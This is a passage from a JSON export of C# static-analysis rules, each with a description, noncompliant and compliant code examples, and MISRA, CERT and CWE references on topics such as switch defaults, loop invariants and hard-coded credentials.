not be \"commented out\" <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S126","repo":"csharpsquid","name":"\"if ... 
else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x == 0)\n{\n  doSomething();\n} else if (x == 1)\n{\n  doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x == 0)\n{\n  doSomething();\n} else if (x == 1)\n{\n  doSomethingElse();\n} else\n{\n  throw new IllegalStateException();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n  <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. 
<\/li>\n  <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S127","repo":"csharpsquid","name":"\"for\" loop stop conditions should be invariant","htmlDesc":"<p>A <code>for<\/code> loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and\nending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins. <\/p>\n<p>Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and are likely to lead to the\nintroduction of errors in the future.<\/p>\n<p>This rule tracks three types of non-invariant stop conditions:<\/p>\n<ul>\n  <li> When the loop counters are updated in the body of the <code>for<\/code> loop <\/li>\n  <li> When the stop condition depends upon a method call <\/li>\n  <li> When the stop condition depends on an object property, since such properties could change during the execution of the loop. 
<\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo\n{\n    static void Main()\n    {\n        for (int i = 1; i &lt;= 5; i++)\n        {\n            Console.WriteLine(i);\n            if (condition)\n            {\n               i = 20;\n           }\n        }\n    }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo\n{\n    static void Main()\n    {\n        for (int i = 1; i &lt;= 5; i++)\n        {\n            Console.WriteLine(i);\n        }\n    }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.6 - Numeric variables being used within a <em>for<\/em> loop for iteration counting shall not be modified in the body of the\n  loop. <\/li>\n  <li> MISRA C++:2008, 6-5-3 - The <em>loop-counter<\/em> shall not be modified within <em>condition<\/em> or <em>statement<\/em>. <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1301","repo":"csharpsquid","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (variable)\n{\n  case 0:\n    doSomething();\n    break;\n  default:\n    doSomethingElse();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (variable == 0)\n{\n  doSomething();\n}\nelse\n{\n  doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n  <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. 
<\/li>\n  <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S131","repo":"csharpsquid","name":"\"switch\/Select\" statements should end with \"default\/Case Else\" clauses","htmlDesc":"<p>The requirement for a final <code>default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain a\nsuitable comment as to why no action is taken. Even when the <code>switch<\/code> covers all current values of an <code>enum<\/code>, a\n<code>default<\/code> case should still be used because there is no guarantee that the <code>enum<\/code> won't be extended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nint foo = 42;\nswitch (foo) \/\/ Noncompliant\n{\n  case 0:\n    Console.WriteLine(\"foo = 0\");\n    break;\n  case 42:\n    Console.WriteLine(\"foo = 42\");\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nint foo = 42;\nswitch (foo) \/\/ Compliant\n{\n  case 0:\n    Console.WriteLine(\"foo = 0\");\n    break;\n  case 42:\n    Console.WriteLine(\"foo = 42\");\n    break;\n  default:\n    throw new InvalidOperationException(\"Unexpected value foo = \" + foo);\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. 
<\/li>\n  <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n  <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n  <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1313","repo":"csharpsquid","name":"IP addresses should not be hardcoded","htmlDesc":"<p>Hardcoding an IP address into source code is a bad idea for several reasons:<\/p>\n<ul>\n  <li> a recompile is required if the address changes <\/li>\n  <li> it forces the same address to be used in every environment (dev, sys, qa, prod) <\/li>\n  <li> it places the responsibility of setting the value to use in production on the shoulders of the developer <\/li>\n  <li> it allows attackers to decompile the code and thereby discover a potentially sensitive address <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar ip = \"127.0.0.1\";\nvar address = IPAddress.Parse(ip);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar ip = ConfigurationManager.AppSettings[\"myapplication.ip\"];\nvar address = IPAddress.Parse(ip);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Although \"::\" is a valid IPv6 address, the rule doesn't report on it. 
<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"VULNERABILITY"},{"key":"csharpsquid:S134","repo":"csharpsquid","name":"Control flow statements \"if\", \"switch\", \"for\", \"foreach\", \"while\", \"do\"  and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>switch<\/code>, <code>for<\/code>, <code>foreach<\/code>, <code>while<\/code>, <code>do<\/code>, and <code>try<\/code>\nstatements are key ingredients for making what's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nif (condition1) \/\/ Compliant - depth = 1\n{\n  \/* ... *\/\n  if (condition2) \/\/ Compliant - depth = 2\n  {\n    \/* ... *\/\n    for(int i = 0; i &lt; 10; i++) \/\/ Compliant - depth = 3, not exceeding the limit\n    {\n      \/* ... *\/\n      if (condition4) \/\/ Noncompliant - depth = 4\n      {\n        if (condition5) \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n        {\n          \/* ... *\/\n        }\n        return;\n      }\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[{"key":"max","htmlDesc":"Maximum allowed control flow statement nesting depth.","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S1449","repo":"csharpsquid","name":"Culture should be specified for \"string\" operations","htmlDesc":"<p><code>string.ToLower()<\/code>, <code>ToUpper<\/code>, <code>IndexOf<\/code>, <code>LastIndexOf<\/code>, and <code>Compare<\/code> are all\nculture-dependent, as are some (floating point number and <code>DateTime<\/code>-related) calls to <code>ToString<\/code>. 
Fortunately, all have\nvariants which accept an argument specifying the culture or formatter to use. Leave that argument off and the call will use the system default\nculture, possibly creating problems with international characters.<\/p>\n<p><code>string.CompareTo()<\/code> is also culture specific, but has no overload that takes a <code>CultureInfo<\/code>, so instead it's better to use\n<code>CompareOrdinal<\/code>, or <code>Compare<\/code> with an explicit culture.<\/p>\n<p>Calls without a culture may work fine in the system's \"home\" environment, but break in ways that are extremely difficult to diagnose for customers\nwho use different cultures. Such bugs can be nearly, if not completely, impossible to reproduce when it's time to fix them.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar lowered = someString.ToLower(); \/\/Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar lowered = someString.ToLower(CultureInfo.InvariantCulture);\n<\/pre>\n<p>or<\/p>\n<pre>\nvar lowered = someString.ToLowerInvariant();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/EwAiAg\">CERT, STR02-J.<\/a> - Specify an appropriate locale when comparing\n  locale-dependent data <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S1479","repo":"csharpsquid","name":"\"switch\" statements should not have too many \"case\" clauses","htmlDesc":"<p>When <code>switch<\/code> statements have large sets of <code>case<\/code> clauses, it is usually an attempt to map two sets of data. 
A real map\nstructure would be more readable and maintainable, and should be used instead.<\/p>\n<h2>Exceptions<\/h2>\n<p>This rule ignores <code>switch<\/code>es over <code>Enum<\/code>s and empty, fall-through cases.<\/p>","status":"READY","tags":["rank3"],"langName":"C#","params":[{"key":"maximum","htmlDesc":"Maximum number of case","defaultValue":"30","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S1481","repo":"csharpsquid","name":"Unused local variables should be removed","htmlDesc":"<p>If a local variable is declared but not used, it is dead code and should be removed. Doing so will improve maintainability because developers will\nnot wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic int NumberOfMinutes(int hours)\n{\n  int seconds = 0;   \/\/ seconds is never used\n  return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic int NumberOfMinutes(int hours)\n{\n  return hours * 60;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Unused locally created resources in a <code>using<\/code> statement are not reported.<\/p>\n<pre>\nusing(var t = new TestTimer()) \/\/ t never used, but compliant.\n{\n  \/\/...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1643","repo":"csharpsquid","name":"Strings should not be concatenated using '+' in a loop","htmlDesc":"<p><code>StringBuilder<\/code> is more efficient than string concatenation, especially when the operator is repeated over and over as in loops.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstring str = \"\";\nfor (int i = 0; i &lt; arrayOfStrings.Length ; ++i)\n{\n  str = str + arrayOfStrings[i];\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nStringBuilder bld = new StringBuilder();\nfor (int i = 0; i &lt; arrayOfStrings.Length; ++i)\n{\n  bld.Append(arrayOfStrings[i]);\n}\nstring str = 
bld.ToString();\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1656","repo":"csharpsquid","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic void SetName(string name)\n{\n  name = name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic void SetName(string name)\n{\n  this.name = name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S1659","repo":"csharpsquid","name":"Multiple variables should not be declared on the same line","htmlDesc":"<p>Declaring multiple variables on one line is difficult to read.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass\n{\n  private int a, b; \/\/ Noncompliant\n\n  public void Method()\n  {\n    int c, d; \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass\n{\n  private int a;\n  private int b;\n\n  public void Method()\n  {\n    int c;\n    int d;\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 8-0-1 - An init-declarator-list or a member-declarator-list shall consist of a single init-declarator or member-declarator\n  respectively <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7wHEAw\">CERT, DCL52-J.<\/a> - Do not declare more than one variable per declaration\n  <\/li>\n  <li> 
<a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/VgU\">CERT, DCL04-C.<\/a> - Do not declare more than one variable per declaration <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/fAAhAQ\">CERT, DCL04-CPP.<\/a> - Do not declare more than one variable per declaration\n  <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1698","repo":"csharpsquid","name":"\"==\" should not be used when \"Equals\" is overridden","htmlDesc":"<p>Using the equality <code>==<\/code> and inequality <code>!=<\/code> operators to compare two objects generally works. The operators can be\noverloaded, and therefore the comparison can resolve to the appropriate method. However, when the operators are used on interface instances, then\n<code>==<\/code> resolves to reference equality, which may result in unexpected behavior if implementing classes override <code>Equals<\/code>.\nSimilarly, when a class overrides <code>Equals<\/code>, but instances are compared with non-overloaded <code>==<\/code>, there is a high chance that\nvalue comparison was meant instead of the reference one.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic interface IMyInterface\n{\n}\n\npublic class MyClass : IMyInterface\n{\n    public override bool Equals(object obj)\n    {\n        \/\/...\n    }\n}\n\npublic class Program\n{\n    public static void Method(IMyInterface instance1, IMyInterface instance2)\n    {\n        if (instance1 == instance2) \/\/ Noncompliant, will do reference equality check, but was that intended? 
MyClass overrides Equals.\n        {\n            Console.WriteLine(\"Equal\");\n        }\n    }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic interface IMyInterface\n{\n}\n\npublic class MyClass : IMyInterface\n{\n    public override bool Equals(object obj)\n    {\n        \/\/...\n    }\n}\n\npublic class Program\n{\n    public static void Method(IMyInterface instance1, IMyInterface instance2)\n    {\n        if (object.Equals(instance1, instance2)) \/\/ object.Equals checks for null and then calls the instance-based Equals, so MyClass.Equals is used\n        {\n            Console.WriteLine(\"Equal\");\n        }\n    }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The rule does not report on comparisons of <code>System.Type<\/code> instances and on comparisons inside <code>Equals<\/code> overrides.<\/p>\n<p>It also does not raise an issue when one of the operands is <code>null<\/code> nor when one of the operands is cast to <code>object<\/code> (because\nin this case we want to ensure reference equality even if some <code>==<\/code> overload is present).<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/595.html\">MITRE, CWE-595<\/a> - Comparison of Object References Instead of Object Contents <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/597.html\">MITRE, CWE-597<\/a> - Use of Wrong Operator in String Comparison <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/wwD1AQ\">CERT, EXP03-J.<\/a> - Do not use the equality operators when comparing values of\n  boxed primitives <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/8AEqAQ\">CERT, EXP50-J.<\/a> - Do not confuse abstract object equality with reference\n  equality <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1751","repo":"csharpsquid","name":"Jump statements should not be used unconditionally","htmlDesc":"<p>Having an 
unconditional <code>break<\/code>, <code>return<\/code>, <code>throw<\/code> or <code>goto<\/code> in a loop renders it useless; the loop\nwill only execute once and the loop structure itself is simply wasted keystrokes.<\/p>\n<p>Having an unconditional <code>continue<\/code> in a loop can render the loop meaningless, or is itself wasted keystrokes, depending on where in the\nloop it occurs.<\/p>\n<p>Having an unconditional <code>return<\/code> anywhere other than at the end of a function or method simply renders all the rest of the code in the\nmethod useless.<\/p>\n<p>For these reasons, unconditional jump statements should never be used except for the final <code>return<\/code> in a function or method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 0; i &lt; 10; i++)\n{\n    Console.WriteLine(i);\n    break;  \/\/ loop only executes once\n}\n\nfor (var i = 0; i &lt; 10; i++)\n{\n    continue;\n    Console.WriteLine(i); \/\/ this is never executed\n}\n\nfor (var i = 0; i &lt; 10; i++)\n{\n    Console.WriteLine(i);\n    continue;  \/\/ this is meaningless; the loop would continue anyway\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 0; i &lt; 10; i++)\n{\n    Console.WriteLine(i);\n}\n\nfor (var i = 0; i &lt; 10; i++)\n{\n    Console.WriteLine(i);\n    if (ErrorOccurred())\n    {\n        break;\n    }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.1 - There shall be no unreachable code. <\/li>\n  <li> MISRA C++:2008, 0-1-1 - A <em>project<\/em> shall not contain <em>unreachable code<\/em>. <\/li>\n  <li> MISRA C++:2008, 0-1-9 - There shall be no dead code. 
<\/li>\n  <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S1858","repo":"csharpsquid","name":"\"ToString()\" calls should not be redundant","htmlDesc":"<p>Invoking a method designed to return a string representation of an object which is already a string is a waste of keystrokes. Similarly, explicitly\ninvoking <code>ToString()<\/code> when the compiler would do it implicitly is also needless code-bloat.<\/p>\n<p>This rule raises an issue when <code>ToString()<\/code> is invoked:<\/p>\n<ul>\n  <li> on a <code>string<\/code> <\/li>\n  <li> on a non-<code>string<\/code> operand to concatenation <\/li>\n  <li> on an argument to <code>string.Format<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar s = \"foo\";\nvar t = \"fee fie foe \" + s.ToString();  \/\/ Noncompliant\nvar someObject = new object();\nvar u = \"\" + someObject.ToString(); \/\/ Noncompliant\nvar v = string.Format(\"{0}\", someObject.ToString()); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar s = \"foo\";\nvar t = \"fee fie foe \" + s;\nvar someObject = new object();\nvar u = \"\" + someObject;\nvar v = string.Format(\"{0}\", someObject);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The rule does not report on value types, where leaving off the <code>ToString()<\/code> call would result in automatic boxing.<\/p>\n<pre>\nvar v = string.Format(\"{0}\", 1.ToString());\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1862","repo":"csharpsquid","name":"Related \"if\/else if\" 
statements should not have the same condition","htmlDesc":"<p>A chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will be executed: the first\none with a condition that evaluates to <code>true<\/code>. <\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (param == 1)\n{\n  OpenWindow();\n}\nelse if (param == 2)\n{\n  CloseWindow();\n}\nelse if (param == 1) \/\/ Noncompliant\n{\n  MoveWindowToTheBackground();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (param == 1)\n{\n  OpenWindow();\n}\nelse if (param == 2)\n{\n  CloseWindow();\n}\nelse if (param == 3)\n{\n  MoveWindowToTheBackground();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S1871","repo":"csharpsquid","name":"Two branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in the same <code>switch<\/code> statement or branches in the same <code>if<\/code> structure with the same\nimplementation is at best duplicate code, and at worst a coding error. 
If the same logic is truly needed for both instances, then in an\n<code>if<\/code> structure they should be combined, or for a <code>switch<\/code>, one should fall through to the other.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (i)\n{\n  case 1:\n    DoSomething();\n    break;\n  case 2:\n    DoSomethingDifferent();\n    break;\n  case 3:  \/\/ Noncompliant; duplicates case 1's implementation\n    DoSomething();\n    break;\n  default:\n    DoTheRest();\n}\n\nif (a &gt;= 0 &amp;&amp; a &lt; 10)\n{\n  DoTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20)\n{\n  DoTheOtherThing();\n}\nelse if (a &gt;= 20 &amp;&amp; a &lt; 50)\n{\n  DoTheThing();  \/\/ Noncompliant; duplicates first condition\n}\nelse\n{\n  DoTheRest();\n}\n\nif (b == 0)\n{\n  DoOneMoreThing();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (i) {\n  case 1:\n  case 3:\n    DoSomething();\n    break;\n  case 2:\n    DoSomethingDifferent();\n    break;\n  default:\n    DoTheRest();\n}\n\nif ((a &gt;= 0 &amp;&amp; a &lt; 10) || (a &gt;= 20 &amp;&amp; a &lt; 50))\n{\n  DoTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20)\n{\n  DoTheOtherThing();\n}\nelse\n{\n  DoTheRest();\n}\n\nDoOneMoreThing();\n<\/pre>\n<p>or<\/p>\n<pre>\nswitch (i)\n{\n  case 1:\n    DoSomething();\n    break;\n  case 2:\n    DoSomethingDifferent();\n    break;\n  case 3:\n    DoThirdThing();\n    break;\n  default:\n    DoTheRest();\n}\n\nif (a &gt;= 0 &amp;&amp; a &lt; 10)\n{\n  DoTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20)\n{\n  DoTheOtherThing();\n}\nelse if (a &gt;= 20 &amp;&amp; a &lt; 50)\n{\n  DoTheThirdThing();\n}\nelse\n{\n  DoTheRest();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Blocks in an <code>if<\/code> chain that contain a single line of code are ignored, as are blocks in a <code>switch<\/code> statement that contain a\nsingle line of code with or without a following 
<code>break<\/code>.<\/p>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1940","repo":"csharpsquid","name":"Boolean checks should not be inverted","htmlDesc":"<p>It is needlessly complex to invert the result of a boolean comparison. The opposite comparison should be made instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ( !(a == 2)) { ...}  \/\/ Noncompliant\nbool b = !(i &lt; 10);  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (a != 2) { ...}\nbool b = (i &gt;= 10);\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1994","repo":"csharpsquid","name":"\"for\" loop increment clauses should modify the loops' counters","htmlDesc":"<p>It can be extremely confusing when a <code>for<\/code> loop's counter is incremented outside of its increment clause. In such cases, the increment\nshould be moved to the loop's increment clause if at all possible.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (i = 0; i &lt; 10; j++) \/\/ Noncompliant\n{\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (i = 0; i &lt; 10; i++)\n{\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S2068","repo":"csharpsquid","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. 
This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code, in a strongly-protected encrypted configuration file, a database, or a secrets store, and loaded\nat run time. A credential that has already been committed also remains in version-control history after it is removed from the code, so it must be\nrotated, not merely deleted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstring username = \"admin\";\nstring password = \"Password123\"; \/\/ Noncompliant\nstring usernamePassword  = \"user=admin&amp;password=Password123\"; \/\/ Noncompliant\nstring usernamePassword2 = \"user=admin&amp;\" + \"password=\" + password; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstring username = \"admin\";\nstring password = GetEncryptedPassword();\nstring usernamePassword = string.Format(\"user={0}&amp;password={1}\", GetEncryptedUsername(), GetEncryptedPassword());\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n  Broken Authentication and Session Management <\/li>\n  <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"VULNERABILITY"},{"key":"csharpsquid:S2197","repo":"csharpsquid","name":"Modulus results should not be checked for direct equality","htmlDesc":"<p>In C#, <code>%<\/code> is a remainder operator rather than a true modulus: when the left operand is negative, the result is negative or zero. 
